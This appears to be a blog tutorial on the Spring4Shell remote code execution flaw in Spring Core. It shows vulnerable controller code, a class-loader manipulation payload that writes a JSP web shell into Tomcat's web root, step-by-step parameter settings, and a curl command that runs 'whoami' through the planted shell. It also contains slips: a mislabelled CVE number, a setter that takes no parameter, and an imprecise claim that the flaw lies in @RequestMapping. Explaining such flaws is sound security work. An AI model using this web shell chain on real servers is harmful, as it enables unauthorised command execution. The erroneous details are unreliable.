Exploring Spring4Shell exploit

I’m pretty sure you might have heard about the infamous “Spring4Shell” exploit by now, so rather than boring you with the details about how it was discovered or how to exploit it, I’d like to explain how and why it works.

Key Points:

1. Spring4Shell: RCE in Spring Core ≤ 5.3.17
2. CVE-2022–22964: RCE in Spring Cloud Function (≤ 3.1.6 and ≤ 3.2.2)

In this blog, I’m going to write about the vulnerability in Spring Core. Rapid7 team have recreated and explained the entire thing really well.

Vulnerable Code Example:

package net.javaguides.springmvc.helloworld.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

import net.javaguides.springmvc.helloworld.model.HelloWorld;

/**
 * @author Ramesh Fadatare
 */
@Controller
public class HelloWorldController {
    @RequestMapping("/rapid7")
    public void vulnerable(HelloWorld model) {
    }
}

Here’s what’s happening:

• The HelloWorldController handles HTTP requests to http://target.com/appname/rapid7.
• The function vulnerable processes the requests and their parameters.
• This function has a POJO (Plain Old Java Object) parameter.

The vulnerability lies within the @RequestMapping annotation, enabling a “Class Loader Manipulation” attack.

Another Example:

public class Counter {
    private long count;

    public long getCount() {
        return count;
    }

    public void setCount() {
        this.count = count;
    }
}

@Controller
public class HelloController {
    @PostMapping("/count")
    public String getCount(@ModelAttribute Counter count, Model model) {
        return "Here is the count";
    }
}

A request to /count will respond with "Here is the count". However, if malicious parameters are included, the exploit may trigger, like:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i
if("j".equals(request.getParameter("pwd"))){
  java.io.InputStream in = %{c1}i.getRuntime()
      .exec(request.getParameter("cmd"))
      .getInputStream();
  int a = -1;
  byte[] b = new byte[2048];
  while((a=in.read(b))!=-1){
     out.println(new String(b));
  } } %{suffix}i

This payload manipulates the class loader to create a web shell.

Steps to Exploit:

1. Specify the file extension:

   class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
   

2. Define the directory to store the payload:

   class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
   

3. Assign a name to the web shell:

   class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
   

4. Execute the payload:

   curl http://localhost:8000/tomcatwar.jsp?pwd=j&cmd=whoami
   

This command reveals the response of whoami from the system.

Testing the Exploit:

I used this repo to host a vulnerable Spring Framework Application locally and test the vulnerability:
https://github.com/jbaines-r7/spring4shell_vulnapp

References:

• Spring4Shell Zero-Day Vulnerability in Spring Framework (Rapid7 Blog)